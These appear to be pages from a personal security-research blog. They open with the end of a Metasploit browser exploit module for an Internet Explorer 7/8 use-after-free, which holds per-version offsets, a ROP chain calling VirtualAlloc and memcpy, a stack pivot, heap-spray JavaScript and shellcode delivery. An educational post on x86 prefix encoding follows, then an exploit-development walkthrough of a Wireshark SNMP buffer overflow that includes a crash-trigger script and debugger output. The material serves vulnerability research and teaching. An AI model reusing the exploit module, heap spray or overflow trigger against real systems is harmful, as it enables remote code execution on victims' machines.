                {
                    'Space'         => 1024,
                    'BadChars'      => "\x00\x09\x0a\x0d'\\",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],

                    # In IE6 the mshtml!CObjectElement size is 0xac

                    [ 'Internet Explorer 7', # 7.0.5730.13
                        {
                            # sizeof(mshtml!CObjectElement)
                            'FreedObjSize' =>  0xb0,
                            'FakeObjCount' => 0x4000,
                            'FakeObjCountKeep' => 0x2000,
                            'ForLoopNumObjects' => 3,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>0,
                            'ROP' => false,
                        }
                    ],

                    [ 'Internet Explorer 8 (no DEP)', # 8.0.6001.18702
                        {
                            # sizeof(mshtml!CObjectElement)
                            'FreedObjSize' =>  0xe0, # 0xdc rounded up
                            'FakeObjCount' => 0x8000,
                            'FakeObjCountKeep' => 0x3000,
                            'ForLoopNumObjects' => 5,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>0,
                            'ROP' => false,
                        }
                    ],

                    [ 'Internet Explorer 8',
                        {
                            'FreedObjSize' =>  0xe0, # 0xdc rounded up
                            'FakeObjCount' => 0x8000,
                            'FakeObjCountKeep' => 0x3000,
                            'ForLoopNumObjects' => 5,
                            'FreedObjOverwritePointer'=>0x0c0c0c0c,
                            'FreedObjOffsetAlignSize'=>2,
                            'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll
                            'ROP' => true,
                        }
                    ],

                    [ 'Debug Target (Crash)',
                        {
                        }
                    ],
                ],
            'DisclosureDate' => 'June 16 2011',
            'DefaultTarget'  => 0))
    end

    def auto_target(cli, request)
        agent = request.headers['User-Agent']
        if agent =~ /MSIE 8\.0/
            mytarget = targets[3] # IE 8
        elsif agent =~ /MSIE 7\.0/
            mytarget = targets[1]
        else
            print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
        end

        mytarget
    end

    
    # 3/22/2011
    # fully patched x32 WinXP SP3, IE 8.0.6001.18702
    def winxp_sp3_rva
        {
            "kernel32!VirtualAlloc"                => 0x7c809af1,
            "ntdll!memcpy"                        => 0x7c901db3,
        }
    end

    def compile_rop(rop_stack)
        rva = winxp_sp3_rva()
        num_random = 0
        rop_stack.map do |rop_val|
            case rop_val
            when String
                if rop_val == "random"
                    # useful for debugging
                    # num_random += 1
                    # 0xaabbcc00 + num_random
                    rand(0xffffffff)
                else
                    raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val]
                    rva[rop_val]
                end
            when Integer
                rop_val
            else
                raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}"
            end
        end.pack("V*")
    end

    def on_request_uri(cli, request)
        mytarget = target
        if target.name == 'Automatic'
            mytarget = auto_target(cli, request)
            unless mytarget
                send_not_found(cli)
                return
            end
        end
        @mytarget = mytarget
        @debug = true if mytarget == targets[4]

        return if ((p = regenerate_payload(cli)) == nil)

        if @debug
            data = <<-DATA
                <html>
                    <body>
                        <script language='javascript'>
                            document.body.innerHTML += "<object align='right' hspace='1000'   width='1000'>TAG_1</object>";
                            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
                            document.body.innerHTML += "AAAAAAA";
                            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
                        </script>
                    </body>
                </html>
            DATA
            print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
            send_response(cli, data, { 'Content-Type' => 'text/html' })
            return
        end

        raw_shellcode = payload.encoded
        shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch))

        spray = nil
        rop_shellcode_spray = nil

        obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V")

        if @mytarget['ROP']
            rop_stack = []
            0x1f.times do |i|
                rop_stack << "random"
            end

            idx = -1
            idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc"        # 1:
            idx += 1 ; rop_stack[idx] = "ntdll!memcpy"                # 2:ret 10 to this after VirtualAlloc
            idx += 1 ; rop_stack[idx] = 0x7f000000                    # 1:VirtualAlloc:lpAddress
            idx += 1 ; rop_stack[idx] = 0x4000                        # 1:VirtualAlloc:dwSize
            idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000)            # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE
            idx += 1 ; rop_stack[idx] = 0x40                        # 1:VirtualAlloc:flProtect rwx
            idx += 1 ; rop_stack[idx] = 0x7f001000                    # 3:into this after memcpy
            idx += 1 ; rop_stack[idx] = 0x7f001000                    # 2:memcpy:dst
            idx += 1 ; rop_stack[idx] = 0x23000100                    # 2:memcpy:src
            idx += 1 ; rop_stack[idx] = 0x2fff                        # 2:memcpy:size

            # align the rest of it
            back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length)
            rop_stack = back + rop_stack

            rop_stack << @mytarget['StackPivot']

            # align the stack for 0c0c0c0c
            front = rop_stack.slice!(0, 19)
            rop_stack = rop_stack + front

            # resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc)
            rop = compile_rop(rop_stack)

            nops = make_nops(0x1000 - raw_shellcode.length)
            nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch))

            rop_shellcode_spray = <<-JS
                // spray up to 0x23000000
                var shellcode = unescape("#{shellcode}");
                var nops = unescape("#{nops}");
                while(nops.length < 0x1000) nops += nops;
                var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode;
                while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock;
                shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2);
                for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); }
            JS

            spray = rop
            shellcode = ""
        else
            spray = obj_overwrite_ptr
        end

        spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch))

        js = <<-JS
            heap_obj = new heapLib.ie(0x20000);
            var heapspray = unescape("#{spray}");
            while(heapspray.length < 0x1000) heapspray += heapspray;
            var shellcode = unescape("#{shellcode}");
            var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode;
            var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"};
            var front = heapblock.substring(0, offset);
            var end = heapblock.substring(offset);
            heapblock = end + front;
            while(heapblock.length < 0x20000) heapblock += heapblock;
            finalspray = heapblock.substring(0, (0x10000-6)/2);
            for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); }

            #{rop_shellcode_spray}

            var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}");
            while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; }
            obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2);

            for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) {
                document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>";
            }

            for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); }
            for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); }

            document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>";
            document.body.innerHTML += "AAAA";
            document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>";
        JS
        opts = {
            'Symbols' => {
                'Variables' => %w{ heap_obj heapspray shellcode heapblock offset front end finalspray counter1
                                   obj_overwrite counter2 counter3 num_objs_counter counter4 counter5
                                   nops shell_heapblock shell_finalspray shell_counter
                                   fill_free_objs freeme keepme1 keepme2 },
                'Methods' => %w{  }
            }
        }
        js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
        # js.obfuscate()
        js = heaplib(js)

        html = <<-HTML
            <html>
                <body>
                    <script language='javascript'>
                    #{js}
                    </script>
                </body>
            </html>
        HTML

        print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")

        send_response(cli, html, {'Content-Type'=>'text/html'})
    end
end
Laters

Monday, April 4, 2011

Interesting Behaviors in x86 Instructions

**
This is an expanded and improved version of a talk I gave at the last AHA! meeting here in Austin. My slides for that talk can be found here
**


Recently I've been working on my windbg extension, narly. Part of my intended purpose for it is to be able to search for ROP gadgets, but to do that I needed to find a disassembler that I could use. I couldn't use the disassembler available through the windbg extension API, since the only thing you can do is call IDebugControl::Disassemble, which just returns a string of the disassembly. I could have used a number of other open-source disassemblers, but decided to reinvent the wheel and write my own. A lot of people would groan at the thought of reinventing the wheel, but I usually enjoy it since it's one of the best ways I learn.

I've been coding my disassembler straight from the Intel® 64 and IA-32 Architectures Software Developer's Manual: Volume 2A: Instruction Set Reference, A-M and Volume 2B: Instruction Set Reference, N-Z. Reading through specs that define how things are supposed to behave is always interesting, because you start to understand some of the boundaries/corner cases and see ways that some potentially interesting behaviors might occur. This blog post is about some interesting techniques I've come across to represent the same instruction in multiple ways (using a different set of bytes to do the exact same thing.) Note that I've only been able to test this out on Intel processors.

To understand most of what I'll be talking about, you'll have to somewhat understand the parts of an x86 instruction, as well as the "rules" that go with them. Once I go over the "rules", I'll then explain the ways I've come up with to represent the same instruction using different sets of bytes, both by following the rules and by breaking them.

instructions and rules


An x86 instruction is made up of several parts:

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
Everybody knows the opcode part of an instruction, but I'm betting fewer know how the other parts of an instruction work and interact.

prefixes

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
Prefixes are bytes that precede the opcode and modify the meaning or action of the instruction. A single instruction can have up to four separate prefixes (one byte each). Prefixes can be arranged in any order. Below is the list of available prefixes:

prefix | name
-------+-----------------------
  0xf0 | LOCK
  0xf2 | REPNE/REPZ
  0xf3 | REPE/REPZ
       |
  0x2e | CS Segment override
  0x36 | SS Segment override
  0x3e | DS Segment override
  0x26 | ES Segment override
  0x64 | FS Segment override
  0x65 | GS Segment override
       |
  0x2e | *Branch not taken
  0x3e | *Branch taken
       |
  0x66 | Operand-size override
  0x67 | Address-size override
 
*for use only with Jcc instructions
The intel manual says "it is only useful to include up to one prefix code from each of the four groups". This means that an instruction like the one below shouldn't "be useful", since the lock and the rep prefixes are both from the same group:
lock rep add dword ptr[eax],eax
Windbg seems to think that it's not only "not useful", but invalid as well (f0 = lock, f3 = rep):
01011a3f f0              ???
01011a40 f30100          rep add dword ptr [eax],eax
Also, some of the prefixes are supposed to only be used with certain instructions. If they are used with other instructions, the behavior is undefined. For example, the branch prefixes (3e and 2e) are only supposed to be applied to the Jcc instructions (conditional jmps). Applying them to other instructions should yield unexpected behavior.

Below are some examples of the affects prefixes have on instructions:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 59     |       |     |          |          | pop ecx
           66 | 59     |       |     |          |          | pop cx
         f366 | 59     |       |     |          |          | rep pop cx
         f266 | 59     |       |     |          |          | repne pop cx
       f22e66 | 59     |       |     |          |          | repne pop cx
              |        |       |     |          |          |
              | 8b     | 03    |     |          |          | mov eax,dword ptr [ebx]
           67 | 8b     | 03    |     |          |          | mov eax,dword ptr [bp+di]
         6667 | 8b     | 03    |     |          |          | mov ax,word ptr [bp+di]
         663e | 8b     | 03    |     |          |          | mov ax,word ptr ds:[ebx]
              |        |       |     |          |          |
              | 01     | 00    |     |          |          | add dword ptr[eax],eax
           f0 | 01     | 00    |     |          |          | lock add dword ptr[eax],eax

opcode

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
An opcode is the core of an instruction. Everything else is supplementary to it. An opcode can be up to four bytes long, and might include a mandatory prefix.

Each opcode determines how its operands are encoded. For example, an opcode might use the modR/M byte, modR/M and sib bytes, or modR/M byte and displacement,
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 03    |     |          |          | mov eax,dword ptr[ebx]
              | 8b     | 04    | bb  |          |          | mov eax,dword ptr[ebx+edi*4]
              | 8b     | 83    |     | 10203040 |          | mov eax,dword ptr[ebx+40302010]
an immediate value,
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | b8     |       |     |          | aabbccdd | mov eax,ddccbbaa
or add a register index to the opcode:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm         
--------------+--------+-------+-----+----------+----------+--------
              | 58     |       |     |          |          | pop eax   eax = 00
              | 59     |       |     |          |          | pop ecx   ecx = 01
              | 5a     |       |     |          |          | pop edx   edx = 02
              | 5b     |       |     |          |          | pop ebx   ebx = 03
              | 5c     |       |     |          |          | pop esp   esp = 04
              | 5d     |       |     |          |          | pop ebp   ebp = 05
              | 5e     |       |     |          |          | pop esi   esi = 06
              | 5f     |       |     |          |          | pop edi   edi = 07

modR/M

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The modR/M byte is made up of three parts:
  0   1   2   3   4   5   6   7   
+---+---+---+---+---+---+---+---+
|  mod  |reg/opcode |    r/m    |
+-------+-----------+-----------+
The modR/M byte uses either a 16-bit or 32-bit addressing mode. The 0x67 prefix (operand size override) switches the addressing mode from 32 to 16 bit.

Depending on the value of the r/m part of the modR/M byte, the sib byte (32-bit addressing mode only) or a displacement (16 or 32) may also be required. Also, if there is no second operand, the reg/opcode part may be used as an opcode extension.

There are two tables that define the meaning of the modR/M byte, one for each addressing mode:


Below are examples of different ways the modR/M byte might be used:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 03    |     |          |          | mov eax,dword ptr [ebx]
              | 8b     | 05    |     |aabbccdd  |          | mov eax,dword ptr ds:[ddccbbaa]
              | 8b     | 41    |     |   10     |          | mov eax,dword ptr[ecx+10]
              |        |       |     |          |          |
           67 | 8b     | 03    |     |          |          | mov eax, dword ptr[bp+di]
           67 | 8b     | 05    |     |          |          | mov eax, dword ptr[di]
           67 | 8b     | 0c    |     |          |          | mov ecx, dword ptr[si]
           67 | 8b     | 41    |     |   10     |          | mov eax, dword ptr[bx+di+10]
           67 | 8b     | 81    |     |  1010    |          | mov eax, dword ptr[bx+di+1010]

sib

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The sib byte is only required when the "Effective Address" column in the 32-bit modR/M table has a value that looks like
[--][--]
The sib byte has three parts:
  0   1   2   3   4   5   6   7   
+---+---+---+---+---+---+---+---+
| scale |   index   |   base    |
+-------+-----------+-----------+
This byte is used to make instructions behave like this:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 1c    | 83  |          |          | mov ebx,dword ptr[ebx+eax*4]
                                                                                |   |   \----> scale
                                                                                |   |
                                                                                |   \----> index
                                                                                |
                                                                                \----> base
The sib byte's meaning is defined by the table below:


Some examples on using the sib byte are below:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 1c    | 03  |          |          | mov ebx,dword ptr[ebx+eax]
              | 8b     | 1c    | 43  |          |          | mov ebx,dword ptr[ebx+eax*2]
              | 8b     | 1c    | 83  |          |          | mov ebx,dword ptr[ebx+eax*4]
              | 8b     | 1c    | c3  |          |          | mov ebx,dword ptr[ebx+eax*8]
              |        |       |     |          |          |
              | 8b     | 1c    | 23  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | 63  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | a3  |          |          | mov ebx,dword ptr[ebx]
              | 8b     | 1c    | e3  |          |          | mov ebx,dword ptr[ebx]

immediate

+----------+--------+--------+-----+--------------+-----------+
| prefixes | opcode | modR/M | sib | displacement | immediate |
+----------+--------+--------+-----+--------------+-----------+
The immediate value of an instruction is very simple, so a few examples should suffice:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 04     |       |     |          |       aa | add al,aa
           66 | 05     |       |     |          |     aaaa | add ax,aaaa
              | 05     |       |     |          | aaaaaaaa | add eax,aaaaaaaa

multiple representations


Now it's time for the good stuff :^)

playing fair with modR/M


If you take another look at the 16 and 32-bit modR/M tables, you'll notice that when the mod part is 0x3 (binary 11), the operand is not dereferenced. This can be used to create another representation of an instruction:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 5a     |       |     |          |          | pop edx
              | 8f     | c2    |     |          |          | pop edx

playing fair with sib


In the sib table, you'll notice that whenever the index part is 0x4 (100 binary), that a scaled index isn't used. This can also let us make multiple representations of an instruction:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 00    |     |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | 20  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | 60  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | a0  |          |          | mov eax,dword ptr[eax]
              | 8b     | 04    | e0  |          |          | mov eax,dword ptr[eax]

being a bully


Now is where we start going into undefined territory.

Certain prefixes are only supposed to be used with certain instructions, and certain prefixes only make sense to be used when certain types of operands are used. For example, if a modR/M byte isn't used, the 0x67 prefix doesn't always do something:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           67 | 58     |       |     |          |          | pop eax
However, sometimes the 0x67 prefix _does_ do something without a modR/M byte (thanks to MazeGen in the comments):
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | a1     |       |     | 10203040 |          | mov eax,dword ptr ds:[40302010]
           67 | a1     |       |     | 1020     |          | mov eax,dword ptr ds:[00002010]
The 0x2e and 0x3e (branch taken/not taken) prefixes are also intended only to be used with Jcc instructions. If they are used with another type of instruction, what happens? You guessed it, nothing:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           2e | 58     |       |     |          |          | pop eax
           3e | 58     |       |     |          |          | pop eax
There is a caveat to using 0x2e and 0x3e as "nop" prefixes. If the instruction dereferences something, then the 0x2e or 0x3e prefix will then be used as a CS or DS segment override:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
              | 8b     | 00    |     |          |          | mov eax,dword ptr[eax]
           2e | 8b     | 00    |     |          |          | mov eax,dword ptr cs:[eax]
           3e | 8b     | 00    |     |          |          | mov eax,dword ptr ds:[eax]
One other prefix that can potentially be useful is the lock prefix (0xf0). The lock prefix can only be used with the add, adc, and, btc, btr, bts, cmpxchg, cmpxch8b, dec, inc, neg, not, or, sbb, sub, xor, xadd, and xchg opcodes, and then only if the dest operand is modifying memory. What does it do though? According to Intel, the lock prefix "forces an operation that ensures exclusive use of shared memory in a multiprocessor environment". Besides the restrictions on which instructions and types of operands it can be used with, the lock prefix can also be used to create another representation of an instruction.

being a bully*4


Earlier in this post I mentioned that up to four prefixes are allowed on an instruction, and that they can be in any order. This also applies to the "nop" prefixes: they can be in any order, but they can also be repeated:
    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
--------------+--------+-------+-----+----------+----------+--------
           67 | 58     |       |     |          |          | pop eax
         6767 | 58     |       |     |          |          | pop eax
       676767 | 58     |       |     |          |          | pop eax
     67676767 | 58     |       |     |          |          | pop eax
           67 | 58     |       |     |          |          | pop eax
         6766 | 58     |       |     |          |          | pop ax
       673e67 | 58     |       |     |          |          | pop eax
     3e66672e | 58     |       |     |          |          | pop ax
If you take a look at this in windbg, you'll notice that it doesn't know how to disassemble the instruction. I'm assuming this is because windbg thinks that only one unique prefix is allowed per instruction:
0100c38c 67              ???
0100c38d 67              ???
0100c38e 67              ???
0100c38f 6758            pop     eax
Even though windbg doesn't know how to disassemble it (haven't tested olly or ida yet or other debuggers), the instruction still executes just fine. This also goes for the lock+rep prefix combination example that I used earlier.

being a bully*14


Being a bully times 14? No way, you say. YES WAY. I decided to test the "rule" about having only four prefixes. It's a lie! In my testing, I was able to add up to fourteen prefixes before I started getting errors. Below are some examples:
                    prefixes  | opcode | modRM | sib |   disp   |   imm    | disasm
                --------------+--------+-------+-----+----------+----------+--------
 6767676767676767676767676767 | 58     |       |     |          |          | pop eax
 673e2e673e2e673e2e673e2e6767 | 58     |       |     |          |          | pop eax
 
 windbg disassembly:
 0100c3a2 67              ???
 0100c3a3 67              ???
 0100c3a4 67              ???
 0100c3a5 67              ???
 0100c3a6 67              ???
 0100c3a7 67              ???
 0100c3a8 67              ???
 0100c3a9 67              ???
 0100c3aa 67              ???
 0100c3ab 67              ???
 0100c3ac 67              ???
 0100c3ad 67              ???
 0100c3ae 67              ???
 0100c3af 6758            pop     eax
I did some additional testing on these extra prefixes, thinking that maybe anything before the last four prefixes don't get applied and can be any prefix, regardless of the compatability. It turns out this is not the case. All of the same rules still apply to all 14 prefixes.

Crazy stuff, huh? The biggest thing I learned from this is to question everything. I'm not used to having to question my disassembler too much. That's something I've been able to trust up to this point, at least for disassembling _one_instrustion_. I almost missed seeing most of this behavior because the first few times I saw windbg fail to disassemble a single instruction, I thought it meant that it wouldn't execute. Luckily, I stepped (a literal hit-F10-and-execute-the-next-instruction step) through it anyways and noticed this behavior.

One other thing to note is that this isn't the first time somebody has run across the multiple-prefixes behavior. A quick conversation with Mark Dowd made it apparent that this behavior is pretty well-known, that different processors may allow even more than 14 prefixes, and that there are major differences in how emulators and native clients execute instructions.

I have other ideas for some more potentially interesting research in this area, but this is all for now. Laters.

Friday, November 5, 2010

Exploit-Dev Practice or Why You Shouldn't Copy-Paste

I've recently taken a break from one of my current personal side projects to practice some open-source bug hunting and exploit-dev. The bug I've found and am going to explain in this post is rather useless (it's not remotely exploitable), but it was a good exercise nonetheless. Since you can't remotely pwn somebody else with it without social engineering, I'm not waiting till it gets patched either :^) So, on with the show...

The bug I found is a simple one in wireshark. You can check out the latest code from wireshark with:
svn co http://anonsvn.wireshark.org/wireshark
Also, for most of my examples, I used one of the recent dev wireshark builds because you can get the pdbs for them. You could go to http://www.wireshark.org/download/automated/win32/ and download a more recent version of the exe and pdbs if you want (wireshark doesn't archive all of the dev builds it makes). The vulnerable code is in epan/dissectors/packet-snmp.c in the snmp_usml_password_to_key_sha1 function. Can you spot the problem?
3057 /*
3058    SHA1 Password to Key Algorithm COPIED from RFC 3414 A.2.2
3059  */
3060 
3061 static void
3062 snmp_usm_password_to_key_sha1(const guint8 *password, guint passwordlen,
3063                   const guint8 *engineID, guint engineLength,
3064                   guint8 *key)
3065 {
3066     sha1_context     SH;
3067     guint8     *cp, password_buf[72];
3068     guint32      password_index = 0;
3069     guint32      count = 0, i;
3070 
3071     sha1_starts(&SH);   /* initialize SHA */
3072 
3073     /**********************************************/
3074     /* Use while loop until we've done 1 Megabyte */
3075     /**********************************************/
3076     while (count < 1048576) {
3077         cp = password_buf;
3078         for (i = 0; i < 64; i++) {
3079             /*************************************************/
3080             /* Take the next octet of the password, wrapping */
3081             /* to the beginning of the password as necessary.*/
3082             /*************************************************/
3083             *cp++ = password[password_index++ % passwordlen];
3084         }
3085         sha1_update (&SH, password_buf, 64);
3086         count += 64;
3087     }
3088     sha1_finish(&SH, key);
3089 
3090     /*****************************************************/
3091     /* Now localize the key with the engineID and pass   */
3092     /* through SHA to produce final key                  */
3093     /* May want to ensure that engineLength <= 32,       */
3094     /* otherwise need to use a buffer larger than 72     */
3095     /*****************************************************/
3096     memcpy(password_buf, key, 20);
3097     memcpy(password_buf+20, engineID, engineLength);
3098     memcpy(password_buf+20+engineLength, key, 20);
3099 
3100     sha1_starts(&SH);
3101     sha1_update(&SH, password_buf, 40+engineLength);
3102     sha1_finish(&SH, key);
3103     return;
3104  }
Besides the actual vuln, I was surprised that this function was copied from an RFC, with few modifications. This is what it looks like in RFC 3414 A.2.2:
   void password_to_key_sha(
      u_char *password,    /* IN */
      u_int   passwordlen, /* IN */
      u_char *engineID,    /* IN  - pointer to snmpEngineID  */
      u_int   engineLength,/* IN  - length of snmpEngineID */
      u_char *key)         /* OUT - pointer to caller 20-octet buffer */
   {
      SHA_CTX     SH;
      u_char     *cp, password_buf[72];
      u_long      password_index = 0;
      u_long      count = 0, i;

      SHAInit (&SH);   /* initialize SHA */

      /**********************************************/
      /* Use while loop until we've done 1 Megabyte */
      /**********************************************/
      while (count < 1048576) {
         cp = password_buf;
         for (i = 0; i < 64; i++) {
             /*************************************************/
             /* Take the next octet of the password, wrapping */
             /* to the beginning of the password as necessary.*/
             /*************************************************/
             *cp++ = password[password_index++ % passwordlen];
         }
         SHAUpdate (&SH, password_buf, 64);
         count += 64;
      }
      SHAFinal (key, &SH);          /* tell SHA we're done */

      /*****************************************************/
      /* Now localize the key with the engineID and pass   */
      /* through SHA to produce final key                  */
      /* May want to ensure that engineLength <= 32,       */
      /* otherwise need to use a buffer larger than 72     */
      /*****************************************************/
      memcpy(password_buf, key, 20);
      memcpy(password_buf+20, engineID, engineLength);
      memcpy(password_buf+20+engineLength, key, 20);

      SHAInit(&SH);
      SHAUpdate(&SH, password_buf, 40+engineLength);
      SHAFinal(key, &SH);
      return;
   }
What really surprised me though was that the comments in the code actually warn about the vuln.

Yes, the vuln is on line 3097 where the engineID is copied into the password_buf. If an engineId is sufficiently large, the buffer will be overflowed. But what actually uses this function? (Like I mentioned earlier, it's not remotely exploitable, so don't get your hopes up :^) Calls to this function end up having call stacks like this:
0:000> k
ChildEBP RetAddr  
0012fb88 008bee28 libwireshark!snmp_usm_password_to_key_sha1
0012fba8 008c07af libwireshark!set_ue_keys+0x58
0012fbc0 008c060a libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 libwireshark!uat_load+0x18a
0012fc04 0069faad libwireshark!uat_load_all+0x53
0012fc44 0069ff59 libwireshark!init_prefs+0x6d
0012fc58 00420673 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 wireshark!read_configuration_files+0x23
0012ff18 00420a81 wireshark!main+0x6b8
0012ff30 00521bae wireshark!WinMain+0x61
0012ffc0 7c817067 wireshark!__tmainCRTStartup+0x140
0012fff0 00000000 kernel32!BaseProcessStart+0x23
This function is responsible for creating a key based on a sha1 hash of a password that is configured by the user in the wireshark preferences and is called when wireshark is opened, regardless if it is opening a pcap or capturing network traffic. The key is then supposed to be used to help decode SNMP traffic. You can configure preferences through the wireshark UI by going to
Edit->Preferences->Protocols->SNMP->Users Table (Edit...)
and adding a new user/password, or you can directly edit the preferences file at
WINDOWS: %APPDATA%\Wireshark\snmp_users
   *NIX: ~/.wireshark/snmp_users
Note: this only works with sha1 hashes. So, you know the vuln, now a quick run-through on how to exploit it. First off, let's see what the classic "A" * a-whole-bunch looks like. I used this to generate the snmp_users file:
File.open("#{ENV['APPDATA']}\\Wireshark\\snmp_users","w") do |file|
 file.write("A" * 200 + ',"username","SHA1","password","DES","password"' + "\n")
end
After setting windbg to be the postmortem debugger (use `windbg -I` to set it), this is what I see when wireshark opens and dies:
(370.90): Access violation - code c0000005 (!!! second chance !!!)
eax=00000002 ebx=00000000 ecx=00000012 edx=00000002 esi=aaaaaaaa edi=aabda5ee
eip=7855aee6 esp=0012faac ebp=0012fab4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Wireshark\MSVCR90.dll - 
MSVCR90!memcpy+0xc6:
7855aee6 8a06            mov     al,byte ptr [esi]          ds:0023:aaaaaaaa=??
The stack trace is:
0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fab4 008bfd3a aabda5ee aaaaaaaa 00000014 MSVCR90!memcpy+0xc6
0012fb88 aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa libwireshark!snmp_usm_password_to_key_sha1+0xea
0012fba8 008c07af 04e71000 04e71054 04e7104c 0xaaaaaaaa
0012fbc0 008c060a 042ed2b8 006df61e 03361b38 libwireshark!ue_se_dup+0x10f
0012fbdc 006e017a 042ed548 0012fc04 006d19a3 libwireshark!renew_ue_cache+0x5a
0012fbe8 006d19a3 0400c510 0012fbfc 0400c510 libwireshark!uat_load+0x18a
0012fc04 0069faad 0133439c 013343a4 013343b0 libwireshark!uat_load_all+0x53
0012fc44 0069ff59 0015233b 00000002 00564944 libwireshark!init_prefs+0x6d
0012fc58 00420673 0012fca4 0012fca8 0012fc80 libwireshark!read_prefs+0x19
0012fcb4 0041e5c8 0012fd0c 0012fd64 00000050 wireshark!read_configuration_files+0x23
